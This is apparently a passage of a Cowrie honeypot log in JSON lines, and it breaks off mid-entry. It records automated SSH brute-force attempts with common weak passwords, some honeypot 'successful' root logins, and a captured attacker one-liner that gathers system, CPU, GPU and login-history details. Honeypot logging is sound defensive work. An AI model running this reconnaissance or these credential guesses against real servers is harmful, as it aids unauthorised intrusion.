{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:54:41.414193Z","src_ip":"212.227.125.160","session":"ab895dbb7108"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:54:41.606738Z","src_ip":"212.227.125.160","session":"ab895dbb7108"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"dell@2023","message":"login attempt [jenkins/dell@2023] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:41.621078Z","src_ip":"212.227.235.229","session":"be4d4a2deab5"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:41.893519Z","src_ip":"212.227.235.229","session":"07b026a63423"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:42.186649Z","src_ip":"212.227.125.160","session":"ab895dbb7108"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:42.744218Z","src_ip":"212.227.235.229","session":"be4d4a2deab5"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:43.380902Z","src_ip":"212.227.125.160","session":"ab895dbb7108"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52824,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f2356b9935f","protocol":"ssh","message":"New connection: 212.227.235.229:52824 (1.2.3.4:22) [session: 5f2356b9935f]","sensor":"my-vps","timestamp":"2025-08-31T04:54:43.631596Z"}
{"eventid":"cowrie.session.connect","src_ip":"121.181.124.85","src_port":44450,"dst_ip":"1.2.3.4","dst_port":23,"session":"a81c6e54ba98","protocol":"telnet","message":"New connection: 121.181.124.85:44450 (1.2.3.4:23) [session: a81c6e54ba98]","sensor":"my-vps","timestamp":"2025-08-31T04:54:43.717180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:54:44.330926Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:54:44.331675Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57866,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c0abf35f2c6","protocol":"ssh","message":"New connection: 212.227.125.160:57866 (1.2.3.4:22) [session: 0c0abf35f2c6]","sensor":"my-vps","timestamp":"2025-08-31T04:54:46.698441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:54:46.699449Z","src_ip":"212.227.125.160","session":"0c0abf35f2c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:54:46.886443Z","src_ip":"212.227.125.160","session":"0c0abf35f2c6"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:54:47.453637Z","src_ip":"212.227.125.160","session":"0c0abf35f2c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:54:47.850795Z","src_ip":"212.227.125.160","session":"0c0abf35f2c6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:54:47.851539Z","src_ip":"212.227.125.160","session":"0c0abf35f2c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:48.040159Z","src_ip":"212.227.125.160","session":"0c0abf35f2c6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:48.041481Z","src_ip":"212.227.125.160","session":"0c0abf35f2c6"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:54:49.870970Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:54:51.828325Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.829189Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.829678Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.830919Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.832982Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.834031Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.834999Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.836418Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.837246Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.838040Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.838748Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.839783Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:54:51.840561Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54666,"dst_ip":"1.2.3.4","dst_port":22,"session":"46d00901185c","protocol":"ssh","message":"New connection: 212.227.125.160:54666 (1.2.3.4:22) [session: 46d00901185c]","sensor":"my-vps","timestamp":"2025-08-31T04:54:52.052593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:54:52.053421Z","src_ip":"212.227.125.160","session":"46d00901185c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:54:52.242303Z","src_ip":"212.227.125.160","session":"46d00901185c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:54:52.571877Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:52.572845Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:52.573933Z","src_ip":"212.227.235.229","session":"5f2356b9935f"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:52.810023Z","src_ip":"212.227.125.160","session":"46d00901185c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:54.001894Z","src_ip":"212.227.125.160","session":"46d00901185c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41788,"dst_ip":"1.2.3.4","dst_port":22,"session":"2532f9b1a33a","protocol":"ssh","message":"New connection: 212.227.235.229:41788 (1.2.3.4:22) [session: 2532f9b1a33a]","sensor":"my-vps","timestamp":"2025-08-31T04:54:57.621743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:54:57.911484Z","src_ip":"212.227.235.229","session":"2532f9b1a33a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:54:58.157444Z","src_ip":"212.227.235.229","session":"2532f9b1a33a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0987654321","message":"login attempt [admin/0987654321] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:59.270047Z","src_ip":"212.227.235.229","session":"2532f9b1a33a"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:55:00.743894Z","src_ip":"212.227.235.229","session":"2532f9b1a33a"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:55:00.824216Z","src_ip":"212.227.235.229","session":"2c7eb71511f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46082,"dst_ip":"1.2.3.4","dst_port":22,"session":"582b25949067","protocol":"ssh","message":"New connection: 212.227.235.229:46082 (1.2.3.4:22) [session: 582b25949067]","sensor":"my-vps","timestamp":"2025-08-31T04:55:01.088204Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57072,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bd056949a7a","protocol":"ssh","message":"New connection: 212.227.125.160:57072 (1.2.3.4:22) [session: 2bd056949a7a]","sensor":"my-vps","timestamp":"2025-08-31T04:55:02.649498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:55:02.650445Z","src_ip":"212.227.125.160","session":"2bd056949a7a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 